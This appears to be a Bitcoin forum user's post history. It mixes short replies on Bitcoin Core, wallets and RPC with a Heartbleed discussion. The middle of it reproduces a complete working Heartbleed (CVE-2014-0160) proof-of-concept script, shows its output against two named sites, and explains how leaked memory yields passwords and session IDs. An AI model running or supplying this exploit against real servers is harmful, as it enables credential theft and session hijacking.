|
linearize.py gets blockchain data from bitcoin core using JSON-RPC calls. it does not read it from disk.
|
|
|
|
it should be pretty obvious socket.error: [Errno 111] Connection refused it probably means you don't have server=1 in bitcoin.conf (since you're running bitcoin-qt rather than bitcoind) |
|
|
|
One word posts are sometimes fine. It really has to do with context, as to whether it is a complete answer/thought in reply. For example
OP: Hey guys! I'm here looking for a 10 BTC loan, I have no credentials, no reason to pay you back, and no trust, anyone want to give me a loan?
You: No
In this situation, you are directly responding and giving a straightforward on topic answer in one word.
[...]
I would like to disagree. If you're rejecting an offer, you don't need to reply because the lack of a reply constitutes a rejection of the offer. |
|
|
|
|
you can try running with -disablewallet to decrease memory usage.
|
|
|
|
|
this only works on the assumption that txids don't change when you swap coins:
1. open wallet in litecoin (for scrypt) and bitcoin (for sha256), and note any txids
2. look for those txids in various block explorers.
|
|
|
|
now you're being disingenuous. the passwords aren't stored in server memory. the passwords aren't stored anywhere, because they're hashed + salted. the most that can be stolen are the hashes.
You're mistaken. After OpenSSL decrypts data it recieves from the client it temporarily stores it in RAM. You can use heartbleed to get the POST data or part of it when a user logs in if you can time it right. The POST data of course contains the password in plaintext, the hashing is done server-side. It is difficult to time it right but it does work. However it is incredibly easy to steal session id's using heartbleed as the session id is sent every time a user views a page. An attacker can then use that session id to login as the user. I stand corrected. |
|
|
|
ummm I highly advise you look into security issues abit more next time. I'm not trying to be a dick but a 3rd party could basically see what was in your servers memory... you understand that right ? If a user logged in, a 3rd party could get lucky and see that information. A 3rd party did NOT need the private key to see the unencrypted data....... To run the exploit you simply had the download the vulnerability checking script written in python and add an extra line to print the 64k worth of data. It was so simple even I was able to get it working and I am in no way a programmer, security expert or developer etc... ( To confirm I never ran the exploit against this site.. i assumed the software was so old there would be no point even bothering to test) the following scenario was proven to work on many many vulnerable servers. Alice lives in Australia and logs into her server in the USA via browser/HTTPS Bob lives in the UK and ran the exploit and the timing was just right, Alice had just logged in and Bob got back 64k of unencrypted data, which contained Alices password. This attack did NOT involve MITM or anything like that... you could basically just keep getting 64k of data from the servers memory.. sometimes it might be posts, useless crap and obviously very occasionaly you might get lucky and get passwords. But you DID NOT need to be in the path of the user or server... that is why this was so critical and every other website was concerned and advised people to change passwords, after is fixed. How do you know someone wasnt doing this exploit for months, but it only went public a few days ago ? Chances are they werent, but how do you now.
The fact you don't think its necessary to change passwords now is very very scary.
You should have a huge alert telling users to change their passwords, as you did with the bitcoin client update.
Seriously.. do you just not give a shit about the users security  ??
You only seem concerned with generating revenue from advertisements.
now you're being disingenuous. the passwords aren't stored in server memory. the passwords aren't stored anywhere, because they're hashed + salted. the most that can be stolen are the hashes. |
|
|
|
(Depending on the jurisdiction, there may be legal requirements to keep a copy of the contents, e.g. in case of libel or other crime; but in that case the copy must be saved in such a way that not even the admins can read it without judicial order.)
that's impossible to implement |
|
|
|
grue,
This is something I do not know how to do, send those pings.
Is this something you do on the command line?
All I recognize from your post is "py"
is this python code?
Please explain. I would like to be able to run tests on the websites of banks where I have accounts and other websites whose security is important to me.
it's a heartbleed demonstration script in python. since I forgot where I got it, and the header says it's public domain, I'll post it here. #!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
if opts.starttls:
re = s.recv(4096)
if opts.debug: print re
s.send('ehlo starttlstest\n')
re = s.recv(1024)
if opts.debug: print re
if not 'STARTTLS' in re:
if opts.debug: print re
print 'STARTTLS not supported...'
sys.exit(0)
s.send('starttls\n')
re = s.recv(1024)
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
|
|
|
|
both are not vulnerable. root@www:~# ./hb-test.py www.bitaddress.org
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0301, length = 81
... received message: type = 22, ver = 0301, length = 3641
... received message: type = 22, ver = 0301, length = 525
... received message: type = 22, ver = 0301, length = 4
Sending heartbeat request...
... received message: type = 21, ver = 0302, length = 2
Received alert:
0000: 02 46 .F
Server returned error, likely not vulnerable root@www:~# ./hb-test.py www.brainwallet.org
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3005
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable |
|
|
|
i have a $5 amazon gift code . Ill sell it for $2 in BTC.
sorry, I don't want to transact in such low quantities. |
|
|
|
luke-jr already made a similar proposal using getblocktemplate, where miners decide which transactions are to be included. Mining Pools are not bad and do not need to be prevented.   |
|
|
|
Bummer, I was hoping to not have to resync...you sure this is the only solution?
you can speed up the sync process by using the bootstrap torrent. |
|
|
|
|
you can't set datadir from a .conf file.
|
|
|
|
i want to test my wallet
test as in? checking your balance? checking whether it's corrupt? You won't lose any personal files it said.
Don't worry trust our crappy products it said.
to be fair, the prompt says: System Restore does not affect personal files, such as e-mail, documents, or photos |
|
|
|
validateaddress 1MYpNKj25HRBFpv22YpuZsuz2zZHKBLUu { "isvalid" : false } address decodes to 00010966776006953D5567439E5E39F86A0D273BEED61967F6. if you do the SHA checksum, it indeed does not match. |
|
|
|
oh look, this sort of fearmongering again. On bitcoin-qt, you're not compromised unless you clicked a bitcoin payment link. Change ALL YOUR PASSWORDS on banking systems, gmail, FB, this forum, all https
what if i told you that all of the major browsers do not use openssl? chrome and firefox use NSS, and microsoft uses their own closed source solution. What if I also told you that the vulnerability does not include code injection, so unless you entered passwords into a openssl application, you're safe. |
|
|
|
Thanks for the reply. Before I change my importing scheme, do you have a rough estimate of the import speed increase using pywallet. If it takes 8-10 minutes using bitcoind, do you have a rough estimate of how long it will take for pywallet... 5 minutes? Also, if I stay using bitcoind, can I upgrade my hardware to increase speed? Thanks again!
I remember a topic there was a topic that discusses the time of pywallet vs json-rpc commands, and pywallet was considerably faster but I don't have the link. The limiting factor when importing is probably the hard drive because of the wallet database transactions (assuming you're not rescanning after every key imported). |
|
|
|
|
Some users report slowness when bitcoind is holding 200000+ keys. The fastest way to import is to use pywallet.
|
|
|
|
|
Show Posts
